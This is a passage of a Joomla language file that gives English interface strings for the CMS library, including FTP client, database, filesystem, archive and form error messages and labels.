JLIB_APPLICATION_SUCCESS_BATCH="Batch process completed."
JLIB_APPLICATION_SUCCESS_ITEM_REORDERED="Ordering saved."
JLIB_APPLICATION_SUCCESS_ORDERING_SAVED="Ordering saved."
JLIB_APPLICATION_SUCCESS_LOAD_HISTORY="Prior version restored. Saved on %s %s."

JLIB_LOGIN_AUTHENTICATE="Username and password do not match or you do not have an account yet."

JLIB_CACHE_ERROR_CACHE_HANDLER_LOAD="Unable to load Cache Handler: %s"
JLIB_CACHE_ERROR_CACHE_STORAGE_LOAD="Unable to load Cache Storage: %s"

JLIB_CAPTCHA_ERROR_PLUGIN_NOT_FOUND="Captcha plugin not set or not found. Please contact a site administrator."

JLIB_CLIENT_ERROR_JFTP_NO_CONNECT="JFTP: :connect: Could not connect to host ' %1$s ' on port ' %2$s '"
JLIB_CLIENT_ERROR_JFTP_NO_CONNECT_SOCKET="JFTP: :connect: Could not connect to host ' %1$s ' on port ' %2$s '. Socket error number: %3$s and error message: %4$s"
JLIB_CLIENT_ERROR_JFTP_BAD_RESPONSE="JFTP: :connect: Bad response. Server response: %s [Expected: 220]"
JLIB_CLIENT_ERROR_JFTP_BAD_USERNAME="JFTP: :login: Bad Username. Server response: %1$s [Expected: 331]. Username sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_BAD_PASSWORD="JFTP: :login: Bad Password. Server response: %1$s [Expected: 230]. Password sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_PWD_BAD_RESPONSE_NATIVE="FTP: :pwd: Bad response."
JLIB_CLIENT_ERROR_JFTP_PWD_BAD_RESPONSE="JFTP: :pwd: Bad response. Server response: %s [Expected: 257]"
JLIB_CLIENT_ERROR_JFTP_SYST_BAD_RESPONSE_NATIVE="JFTP: :syst: Bad response."
JLIB_CLIENT_ERROR_JFTP_SYST_BAD_RESPONSE="JFTP: :syst: Bad response. Server response: %s [Expected: 215]"
JLIB_CLIENT_ERROR_JFTP_CHDIR_BAD_RESPONSE_NATIVE="JFTP: :chdir: Bad response."
JLIB_CLIENT_ERROR_JFTP_CHDIR_BAD_RESPONSE="JFTP: :chdir: Bad response. Server response: %1$s [Expected: 250]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_REINIT_BAD_RESPONSE_NATIVE="JFTP: :reinit: Bad response."
JLIB_CLIENT_ERROR_JFTP_REINIT_BAD_RESPONSE="JFTP: :reinit: Bad response. Server response: %s [Expected: 220]"
JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_NATIVE="JFTP: :rename: Bad response."
JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_FROM="JFTP: :rename: Bad response. Server response: %1$s [Expected: 350]. From path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_TO="JFTP: :rename: Bad response. Server response: %1$s [Expected: 250]. To path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_CHMOD_BAD_RESPONSE_NATIVE="JFTP: :chmod: Bad response."
JLIB_CLIENT_ERROR_JFTP_CHMOD_BAD_RESPONSE="JFTP: :chmod: Bad response. Server response: %1$s [Expected: 250]. Path sent: %2$s. Mode sent: %3$s"
JLIB_CLIENT_ERROR_JFTP_DELETE_BAD_RESPONSE_NATIVE="JFTP: :delete: Bad response."
JLIB_CLIENT_ERROR_JFTP_DELETE_BAD_RESPONSE="JFTP: :delete: Bad response. Server response: %1$s [Expected: 250]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_MKDIR_BAD_RESPONSE_NATIVE="JFTP: :mkdir: Bad response."
JLIB_CLIENT_ERROR_JFTP_MKDIR_BAD_RESPONSE="JFTP: :mkdir: Bad response. Server response: %1$s [Expected: 257]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_RESTART_BAD_RESPONSE_NATIVE="JFTP: :restart: Bad response."
JLIB_CLIENT_ERROR_JFTP_RESTART_BAD_RESPONSE="JFTP: :restart: Bad response. Server response: %1$s [Expected: 350]. Restart point sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_BUFFER="JFTP: :create: Bad response."
JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_PASSIVE="JFTP: :create: Unable to use passive mode."
JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE="JFTP: :create: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_TRANSFER="JFTP: :create: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_BUFFER="JFTP: :read: Bad response."
JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_PASSIVE="JFTP: :read: Unable to use passive mode."
JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE="JFTP: :read: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_TRANSFER="JFTP: :read: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE="JFTP: :get: Bad response."
JLIB_CLIENT_ERROR_JFTP_GET_PASSIVE="JFTP: :get: Unable to use passive mode."
JLIB_CLIENT_ERROR_JFTP_GET_WRITING_LOCAL="JFTP: :get: Unable to open local file for writing. Local path: %s"
JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE_RETR="JFTP: :get: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE_TRANSFER="JFTP: :get: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_STORE_PASSIVE="JFTP: :store: Unable to use passive mode."
JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE="JFTP: :store: Bad response."
JLIB_CLIENT_ERROR_JFTP_STORE_READING_LOCAL="JFTP: :store: Unable to open local file for reading. Local path: %s"
JLIB_CLIENT_ERROR_JFTP_STORE_FIND_LOCAL="JFTP: :store: Unable to find local file. Local path: %s"
JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE_STOR="JFTP: :store: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_STORE_DATA_PORT="JFTP: :store: Unable to write to data port socket."
JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE_TRANSFER="JFTP: :store: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_WRITE_PASSIVE="JFTP: :write: Unable to use passive mode."
JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE="JFTP: :write: Bad response."
JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE_STOR="JFTP: :write: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_WRITE_DATA_PORT="JFTP: :write: Unable to write to data port socket."
JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE_TRANSFER="JFTP: :write: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_APPEND_PASSIVE="JFTP: :append: Unable to use passive mode"
JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE="JFTP: :append: Bad response"
JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE_APPE="JFTP: :append: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_APPEND_DATA_PORT="JFTP: :append: Unable to write to data port socket"
JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE_TRANSFER="JFTP: :append: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_SIZE_BAD_RESPONSE="JFTP: :size: Bad response"
JLIB_CLIENT_ERROR_JFTP_SIZE_PASSIVE="JFTP: :size: Unable to use passive mode"
JLIB_CLIENT_ERROR_JFTP_LISTNAMES_PASSIVE="JFTP: :listNames: Unable to use passive mode"
JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE="JFTP: :listNames: Bad response"
JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE_NLST="JFTP: :listNames: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE_TRANSFER="JFTP: :listNames: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE="JFTP: :listDetails: Bad response."
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_PASSIVE="JFTP: :listDetails: Unable to use passive mode."
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE_LIST="JFTP: :listDetails: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE_TRANSFER="JFTP: :listDetails: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_UNRECOGNISED="JFTP: :listDetails: Unrecognised folder listing format."
JLIB_CLIENT_ERROR_JFTP_PUTCMD_UNCONNECTED="JFTP: :_putCmd: Not connected to the control port."
JLIB_CLIENT_ERROR_JFTP_PUTCMD_SEND="JFTP: :_putCmd: Unable to send command: %s"
JLIB_CLIENT_ERROR_JFTP_VERIFYRESPONSE="JFTP: :_verifyResponse: Timeout or unrecognised response while waiting for a response from the server. Server response: %s"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_CONNECT_PORT="JFTP: :_passive: Not connected to the control port."
JLIB_CLIENT_ERROR_JFTP_PASSIVE_RESPONSE="JFTP: :_passive: Timeout or unrecognised response while waiting for a response from the server. Server response: %s"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_IP_OBTAIN="JFTP: :_passive: Unable to obtain IP and port for data transfer. Server response: %s"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_IP_VALID="JFTP: :_passive: IP and port for data transfer not valid. Server response: %s"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_CONNECT="JFTP: :_passive: Could not connect to host %1$s on port %2$s. Socket error number: %3$s and error message: %4$s"
JLIB_CLIENT_ERROR_JFTP_MODE_BINARY="JFTP: :_mode: Bad response. Server response: %s [Expected: 200]. Mode sent: Binary."
JLIB_CLIENT_ERROR_JFTP_MODE_ASCII="JFTP: :_mode: Bad response. Server response: %s [Expected: 200]. Mode sent: Ascii."
JLIB_CLIENT_ERROR_HELPER_SETCREDENTIALSFROMREQUEST_FAILED="Looks like User's credentials are no good."
JLIB_CLIENT_ERROR_LDAP_ADDRESS_NOT_AVAILABLE="Address not available."

JLIB_CMS_WARNING_PROVIDE_VALID_NAME="Please provide a valid, non-blank title."

JLIB_DATABASE_ERROR_ADAPTER_MYSQL="The MySQL adapter 'mysql' is not available."
JLIB_DATABASE_ERROR_ADAPTER_MYSQLI="The MySQL adapter 'mysqli' is not available."
JLIB_DATABASE_ERROR_BIND_FAILED_INVALID_SOURCE_ARGUMENT="%s: :bind failed. Invalid source argument."
JLIB_DATABASE_ERROR_ARTICLE_UNIQUE_ALIAS="Another article from this category has the same alias (remember it may be a trashed item)."
JLIB_DATABASE_ERROR_CATEGORY_UNIQUE_ALIAS="Another category with the same parent category has the same alias (remember it may be a trashed item)."
JLIB_DATABASE_ERROR_CHECK_FAILED="%s: :check Failed - %s"
JLIB_DATABASE_ERROR_CHECKIN_FAILED="%s: :check-in failed - %s"
JLIB_DATABASE_ERROR_CHECKOUT_FAILED="%s: :check-out failed - %s"
JLIB_DATABASE_ERROR_CHILD_ROWS_CHECKED_OUT="Child rows checked out."
JLIB_DATABASE_ERROR_CLASS_DOES_NOT_SUPPORT_ORDERING="%s does not support ordering."
JLIB_DATABASE_ERROR_CLASS_IS_MISSING_FIELD="Missing field in the database: %s &#160; %s."
JLIB_DATABASE_ERROR_CLASS_NOT_FOUND_IN_FILE="Table class %s not found in file."
JLIB_DATABASE_ERROR_CONNECT_DATABASE="Unable to connect to the Database: %s"
JLIB_DATABASE_ERROR_CONNECT_MYSQL="Could not connect to MySQL."
JLIB_DATABASE_ERROR_DATABASE_CONNECT="Could not connect to database."
JLIB_DATABASE_ERROR_DATABASE_UPGRADE_FAILED="MySQL Database Upgrade failed. Please check the <a href="_QQ_"index.php?option=com_installer&view=database"_QQ_">Database Fixer</a>."
JLIB_DATABASE_ERROR_DELETE_CATEGORY="Left-Right data inconsistency. Can't delete category."
JLIB_DATABASE_ERROR_DELETE_FAILED="%s: :delete failed - %s"
JLIB_DATABASE_ERROR_DELETE_ROOT_CATEGORIES="Root categories can't be deleted."
JLIB_DATABASE_ERROR_EMAIL_INUSE="The email address you entered is already in use. Please enter another email address."
JLIB_DATABASE_ERROR_EMPTY_ROW_RETURNED="The database row is empty."
JLIB_DATABASE_ERROR_FUNCTION_FAILED="DB function failed with error number %s <br /><span style="_QQ_"color: red;"_QQ_">%s</span>"
JLIB_DATABASE_ERROR_GET_NEXT_ORDER_FAILED="%s: :getNextOrder failed - %s"
JLIB_DATABASE_ERROR_GET_TREE_FAILED="%s: :getTree Failed - %s"
JLIB_DATABASE_ERROR_GETNODE_FAILED="%s: :_getNode Failed - %s"
JLIB_DATABASE_ERROR_GETROOTID_FAILED="%s: :getRootId Failed - %s"
JLIB_DATABASE_ERROR_HIT_FAILED="%s: :hit failed - %s"
JLIB_DATABASE_ERROR_INVALID_LOCATION="%s: :setLocation - Invalid location."
JLIB_DATABASE_ERROR_INVALID_NODE_RECURSION="%s: :move Failed - Can't move the node to be a child of itself."
JLIB_DATABASE_ERROR_INVALID_PARENT_ID="Invalid parent ID."
JLIB_DATABASE_ERROR_LANGUAGE_NO_TITLE="The language should have a title."
JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_IMAGE="A content language already exists with this Image."
JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_LANG_CODE="A content language already exists with this Language Tag."
JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_SEF="A content language already exists with this URL Language Code."
JLIB_DATABASE_ERROR_LOAD_DATABASE_DRIVER="Unable to load Database Driver: %s"
JLIB_DATABASE_ERROR_MENUTYPE="Some menu items or some menu modules related to this menutype are checked out by another user or the default menu item is in this menu."
JLIB_DATABASE_ERROR_MENUTYPE_CHECKOUT="The user checking out does not match the user who checked out this menu and/or its linked menu module."
JLIB_DATABASE_ERROR_MENUTYPE_EMPTY="Menu type empty."
JLIB_DATABASE_ERROR_MENUTYPE_EXISTS="Menu type exists: %s"
JLIB_DATABASE_ERROR_MENU_CANNOT_UNSET_DEFAULT="The Language parameter for this menu item must be set to 'All'. At least one Default menu item must have Language set to All, even if the site is multilingual."
JLIB_DATABASE_ERROR_MENU_CANNOT_UNSET_DEFAULT_DEFAULT="At least one menu item has to be set as Default."
JLIB_DATABASE_ERROR_MENU_UNPUBLISH_DEFAULT_HOME="Can't unpublish default home."
JLIB_DATABASE_ERROR_MENU_DEFAULT_CHECKIN_USER_MISMATCH="The current home menu for this language is checked out."
JLIB_DATABASE_ERROR_MENU_UNIQUE_ALIAS="The alias <strong>%1$s</strong> is already being used by <strong>%2$s</strong> menu item in the <strong>%3$s</strong> menu (remember it may be a trashed item)."
JLIB_DATABASE_ERROR_MENU_UNIQUE_ALIAS_ROOT="Another menu item has the same alias in Root (remember it may be a trashed item). Root is the top level parent."
JLIB_DATABASE_ERROR_MENU_HOME_NOT_COMPONENT="The home menu item must be a component."
JLIB_DATABASE_ERROR_MENU_HOME_NOT_UNIQUE_IN_MENU="A menu should have only one Default home."
JLIB_DATABASE_ERROR_MENU_ROOT_ALIAS_COMPONENT="A first level menu item alias can't be 'component'."
JLIB_DATABASE_ERROR_MENU_ROOT_ALIAS_FOLDER="A first level menu item alias can't be '%s' because '%s' is a sub-folder of your joomla installation folder."
JLIB_DATABASE_ERROR_MOVE_FAILED="%s: :move failed - %s"
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_CATEGORY="Category must have a title."
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_EXTENSION="Extension must have a title."
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_MENUITEM="Menu Item must have a title."
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_MODULE="Module must have a title."
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_UPDATESITE="Update site must have a title."
JLIB_DATABASE_ERROR_NEGATIVE_NOT_PERMITTED="%s can't be negative."
JLIB_DATABASE_ERROR_NO_ROWS_SELECTED="No rows selected."
JLIB_DATABASE_ERROR_NOT_SUPPORTED_FILE_NOT_FOUND="Table %s not supported. File not found."
JLIB_DATABASE_ERROR_NULL_PRIMARY_KEY="Null primary key not allowed."
JLIB_DATABASE_ERROR_ORDERDOWN_FAILED="%s: :orderDown Failed - %s"
JLIB_DATABASE_ERROR_ORDERUP_FAILED="%s: :orderUp Failed - %s"
JLIB_DATABASE_ERROR_PLEASE_ENTER_A_USER_NAME="Please enter a username."
JLIB_DATABASE_ERROR_PLEASE_ENTER_YOUR_NAME="Please enter your name."
JLIB_DATABASE_ERROR_PUBLISH_FAILED="%s: :publish failed - %s"
JLIB_DATABASE_ERROR_REBUILD_FAILED="%s: :rebuild Failed - %s"
JLIB_DATABASE_ERROR_REBUILDPATH_FAILED="%s: :rebuildPath Failed - %s"
JLIB_DATABASE_ERROR_REORDER_FAILED="%s: :reorder failed - %s"
JLIB_DATABASE_ERROR_REORDER_UPDATE_ROW_FAILED="%s: :reorder update the row %s failed - %s"
JLIB_DATABASE_ERROR_ROOT_NODE_NOT_FOUND="Root node not found."
JLIB_DATABASE_ERROR_STORE_FAILED_UPDATE_ASSET_ID="The asset_id field could not be updated."
JLIB_DATABASE_ERROR_STORE_FAILED="%1$s: :store failed<br />%2$s"
JLIB_DATABASE_ERROR_USERGROUP_PARENT_ID_NOT_VALID="There has to be at least one root usergroup"
JLIB_DATABASE_ERROR_USERGROUP_TITLE="User group must have a title."
JLIB_DATABASE_ERROR_USERGROUP_TITLE_EXISTS="User group title already exists. Title must be unique with the same parent."
JLIB_DATABASE_ERROR_USERLEVEL_NAME_EXISTS="Level with the name &quot;%s&quot; already exists."
JLIB_DATABASE_ERROR_USERNAME_CANNOT_CHANGE="Can't use this username."
JLIB_DATABASE_ERROR_USERNAME_INUSE="Username in use."
JLIB_DATABASE_ERROR_VALID_AZ09="Please enter a valid username. No space at beginning or end, at least %d characters, must <strong>not</strong> have the following characters: < > \ &quot; ' &#37; ; ( ) & and be less than 150 characters long."
JLIB_DATABASE_ERROR_VALID_MAIL="The email address you entered is invalid. Please enter another email address."
JLIB_DATABASE_ERROR_VIEWLEVEL="Viewlevel must have a title."
JLIB_DATABASE_FUNCTION_NOERROR="DB function reports no errors."
JLIB_DATABASE_QUERY_FAILED="Database query failed (error # %s): %s"

JLIB_DOCUMENT_ERROR_UNABLE_LOAD_DOC_CLASS="Unable to load document class."
JLIB_ENVIRONMENT_SESSION_EXPIRED="Your session has expired. Please log in again."
JLIB_ENVIRONMENT_SESSION_INVALID="Invalid session cookie. Please check that you have cookies enabled in your web browser."
JLIB_ERROR_COMPONENTS_ACL_CONFIGURATION_FILE_MISSING_OR_IMPROPERLY_STRUCTURED="The %s component's ACL configuration file is either missing or improperly structured."
JLIB_ERROR_INFINITE_LOOP="Infinite loop detected in JError."
JLIB_EVENT_ERROR_DISPATCHER="JEventDispatcher: :register: Event handler not recognised. Handler: %s"
JLIB_FILESYSTEM_BZIP_NOT_SUPPORTED="BZip2 Not Supported."
JLIB_FILESYSTEM_BZIP_UNABLE_TO_READ="Unable to read archive (bz2)."
JLIB_FILESYSTEM_BZIP_UNABLE_TO_WRITE="Unable to write archive (bz2)."
JLIB_FILESYSTEM_BZIP_UNABLE_TO_WRITE_FILE="Unable to write file (bz2)."
JLIB_FILESYSTEM_GZIP_NOT_SUPPORTED="GZlib Not Supported."
JLIB_FILESYSTEM_GZIP_UNABLE_TO_READ="Unable to read archive (gz)."
JLIB_FILESYSTEM_GZIP_UNABLE_TO_WRITE="Unable to write archive (gz)."
JLIB_FILESYSTEM_GZIP_UNABLE_TO_WRITE_FILE="Unable to write file (gz)."
JLIB_FILESYSTEM_GZIP_UNABLE_TO_DECOMPRESS="Unable to decompress data."
JLIB_FILESYSTEM_TAR_UNABLE_TO_READ="Unable to read archive (tar)."
JLIB_FILESYSTEM_TAR_UNABLE_TO_DECOMPRESS="Unable to decompress data."
JLIB_FILESYSTEM_TAR_UNABLE_TO_CREATE_DESTINATION="Unable to create destination."
JLIB_FILESYSTEM_TAR_UNABLE_TO_WRITE_ENTRY="Unable to write entry."
JLIB_FILESYSTEM_ZIP_NOT_SUPPORTED="Zlib Not Supported."
JLIB_FILESYSTEM_ZIP_UNABLE_TO_READ="Unable to read archive (zip)."
JLIB_FILESYSTEM_ZIP_INFO_FAILED="Get ZIP Information failed."
JLIB_FILESYSTEM_ZIP_UNABLE_TO_CREATE_DESTINATION="Unable to create destination."
JLIB_FILESYSTEM_ZIP_UNABLE_TO_WRITE_ENTRY="Unable to write entry."
JLIB_FILESYSTEM_ZIP_UNABLE_TO_READ_ENTRY="Unable to read entry."
JLIB_FILESYSTEM_ZIP_UNABLE_TO_OPEN_ARCHIVE="Unable to open archive."
JLIB_FILESYSTEM_ZIP_INVALID_ZIP_DATA="Invalid ZIP data."
JLIB_FILESYSTEM_STREAM_FAILED="Failed to register string stream."
JLIB_FILESYSTEM_UNKNOWNARCHIVETYPE="Unknown Archive type."
JLIB_FILESYSTEM_UNABLE_TO_LOAD_ARCHIVE="Unable to load archive."
JLIB_FILESYSTEM_ERROR_JFILE_FIND_COPY="JFile: :copy: Can't find or read file: %s"
JLIB_FILESYSTEM_ERROR_JFILE_STREAMS="JFile: :copy(%1$s, %2$s): %3$s"
JLIB_FILESYSTEM_ERROR_COPY_FAILED="Copy failed."
JLIB_FILESYSTEM_ERROR_COPY_FAILED_ERR01="Copy failed: %1$s to %2$s"
JLIB_FILESYSTEM_DELETE_FAILED="Failed deleting %s"
JLIB_FILESYSTEM_CANNOT_FIND_SOURCE_FILE="Can't find source file."
JLIB_FILESYSTEM_ERROR_JFILE_MOVE_STREAMS="JFile: :move: %s"
JLIB_FILESYSTEM_ERROR_RENAME_FILE="Rename failed."
JLIB_FILESYSTEM_ERROR_READ_UNABLE_TO_OPEN_FILE="JFile: :read: Unable to open file: %s"
JLIB_FILESYSTEM_ERROR_WRITE_STREAMS="JFile: :write(%1$s): %2$s"
JLIB_FILESYSTEM_ERROR_UPLOAD="JFile: :upload: %s"
JLIB_FILESYSTEM_ERROR_WARNFS_ERR01="Warning: Failed to change file permissions!"
JLIB_FILESYSTEM_ERROR_WARNFS_ERR02="Warning: Failed to move file!"
JLIB_FILESYSTEM_ERROR_WARNFS_ERR03="Warning: File %s not uploaded for security reasons!"
JLIB_FILESYSTEM_ERROR_WARNFS_ERR04="Warning: Failed to move file: %1$s to %2$s"
JLIB_FILESYSTEM_ERROR_FIND_SOURCE_FOLDER="Can't find source folder."
JLIB_FILESYSTEM_ERROR_FOLDER_EXISTS="Folder already exists."
JLIB_FILESYSTEM_ERROR_FOLDER_CREATE="Unable to create target folder."
JLIB_FILESYSTEM_ERROR_FOLDER_OPEN="Unable to open source folder."
JLIB_FILESYSTEM_ERROR_FOLDER_LOOP="Infinite loop detected."
JLIB_FILESYSTEM_ERROR_FOLDER_PATH="Path not in open_basedir paths."
JLIB_FILESYSTEM_ERROR_COULD_NOT_CREATE_DIRECTORY="Could not create folder."
JLIB_FILESYSTEM_ERROR_DELETE_BASE_DIRECTORY="You can't delete a base folder."
JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER="JFolder: :delete: Path is not a folder. Path: %s"
JLIB_FILESYSTEM_ERROR_FOLDER_DELETE="JFolder: :delete: Could not delete folder. Path: %s"
JLIB_FILESYSTEM_ERROR_FOLDER_RENAME="Rename failed: %s"
JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER_FILES="JFolder: :files: Path is not a folder. Path: %s"
JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER_FOLDER="JFolder: :folder: Path is not a folder. Path: %s"
JLIB_FILESYSTEM_ERROR_STREAMS_FILE_SIZE="Failed to get file size. This may not work for all streams!"
JLIB_FILESYSTEM_ERROR_STREAMS_FILE_NOT_OPEN="File not open."
JLIB_FILESYSTEM_ERROR_STREAMS_FILENAME="File name not set."
JLIB_FILESYSTEM_ERROR_NO_DATA_WRITTEN="Warning: No data written."
JLIB_FILESYSTEM_ERROR_STREAMS_FAILED_TO_OPEN_WRITER="Failed to open writer: %s"
JLIB_FILESYSTEM_ERROR_STREAMS_FAILED_TO_OPEN_READER="Failed to open reader: %s"
JLIB_FILESYSTEM_ERROR_STREAMS_NOT_UPLOADED_FILE="Not an uploaded file!"

JLIB_FILTER_PARAMS_ALNUM="Alpha Numeric"
JLIB_FILTER_PARAMS_FLOAT="Float"
JLIB_FILTER_PARAMS_INTEGER="Integer"
JLIB_FILTER_PARAMS_RAW="Raw"
JLIB_FILTER_PARAMS_SAFEHTML="Safe HTML"
JLIB_FILTER_PARAMS_TEL="Telephone"
JLIB_FILTER_PARAMS_TEXT="Text"

JLIB_FORM_BUTTON_CLEAR="Clear"
JLIB_FORM_BUTTON_SELECT="Select"
JLIB_FORM_CHANGE_IMAGE="Change Image"
JLIB_FORM_CHANGE_IMAGE_BUTTON="Change Image Button"
JLIB_FORM_CHANGE_USER="Select User"
JLIB_FORM_ERROR_FIELDS_CATEGORY_ERROR_EXTENSION_EMPTY="Extension attribute is empty in the category field."
JLIB_FORM_ERROR_FIELDS_GROUPEDLIST_ELEMENT_NAME="Unknown element type: %s"
JLIB_FORM_ERROR_NO_DATA="No data."
JLIB_FORM_ERROR_VALIDATE_FIELD="Invalid xml field."
JLIB_FORM_ERROR_XML_FILE_DID_NOT_LOAD="XML file did not load."
JLIB_FORM_FIELD_INVALID="Invalid field:&#160"
JLIB_FORM_INPUTMODE="latin"
JLIB_FORM_INVALID_FORM_OBJECT="Invalid Form Object: :%s"
JLIB_FORM_INVALID_FORM_RULE="Invalid Form Rule: :%s"
JLIB_FORM_MEDIA_PREVIEW_ALT="Selected image."
JLIB_FORM_MEDIA_PREVIEW_EMPTY="No image selected."
JLIB_FORM_MEDIA_PREVIEW_SELECTED_IMAGE="Selected image."
JLIB_FORM_MEDIA_PREVIEW_TIP_TITLE="Preview"
JLIB_FORM_SELECT_USER="Select a User"
JLIB_FORM_VALIDATE_FIELD_INVALID="Invalid field: %s"
JLIB_FORM_VALIDATE_FIELD_REQUIRED="Field required: %s"
JLIB_FORM_VALIDATE_FIELD_RULE_MISSING="Validation Rule missing: %s"
JLIB_FORM_VALIDATE_FIELD_URL_SCHEMA_MISSING="Invalid URL: URL schema is missing in %1$s. Please add one of the following at the beginning: %2$s."
JLIB_FORM_VALUE_CACHE_APC="Alternative PHP Cache"
JLIB_FORM_VALUE_CACHE_APCU="APC User Cache"
JLIB_FORM_VALUE_CACHE_CACHELITE="Cache_Lite"
JLIB_FORM_VALUE_CACHE_EACCELERATOR="eAccelerator"
JLIB_FORM_VALUE_CACHE_FILE="File"
JLIB_FORM_VALUE_CACHE_MEMCACHE="Memcache"
JLIB_FORM_VALUE_CACHE_MEMCACHED="Memcached (Experimental)"
JLIB_FORM_VALUE_CACHE_REDIS="Redis"
JLIB_FORM_VALUE_CACHE_WINCACHE="Windows Cache"
JLIB_FORM_VALUE_CACHE_XCACHE="XCache"
JLIB_FORM_VALUE_SESSION_APC="Alternative PHP Cache"
JLIB_FORM_VALUE_SESSION_APCU="APC User Cache"
JLIB_FORM_VALUE_SESSION_DATABASE="Database"
JLIB_FORM_VALUE_SESSION_EACCELERATOR="eAccelerator"
JLIB_FORM_VALUE_SESSION_MEMCACHE="Memcache"
JLIB_FORM_VALUE_SESSION_MEMCACHED="Memcached (Experimental)"
JLIB_FORM_VALUE_SESSION_NONE="PHP"
JLIB_FORM_VALUE_SESSION_REDIS="Redis"
JLIB_FORM_VALUE_SESSION_WINCACHE="Windows Cache"
JLIB_FORM_VALUE_SESSION_XCACHE="XCache"
JLIB_FORM_VALUE_TIMEZONE_UTC="Universal Time, Coordinated (UTC)"
JLIB_FORM_VALUE_FROM_TEMPLATE="From Template"
JLIB_FORM_VALUE_INHERITED="Inherited"

JLIB_HTML_ACCESS_MODIFY_DESC_CAPTION_ACL="ACL"
JLIB_HTML_ACCESS_MODIFY_DESC_CAPTION_TABLE="Table"
JLIB_HTML_ACCESS_SUMMARY_DESC_CAPTION="ACL Summary Table"
JLIB_HTML_ACCESS_SUMMARY_DESC="Shown below is an overview of the permission settings for this article. Select the tabs above to customise these settings by action."
JLIB_HTML_ACCESS_SUMMARY="Summary."
JLIB_HTML_ADD_TO_ROOT="Add to root."
JLIB_HTML_ADD_TO_THIS_MENU="Add to this menu."
JLIB_HTML_BATCH_ACCESS_LABEL="Set Access Level"
JLIB_HTML_BATCH_ACCESS_LABEL_DESC="Not making a selection will keep the original access levels when processing."
JLIB_HTML_BATCH_COPY="Copy"
JLIB_HTML_BATCH_FLIPORDERING_LABEL="Reverse the ordering of all articles in the selected categories"
JLIB_HTML_BATCH_LANGUAGE_LABEL="Set Language"
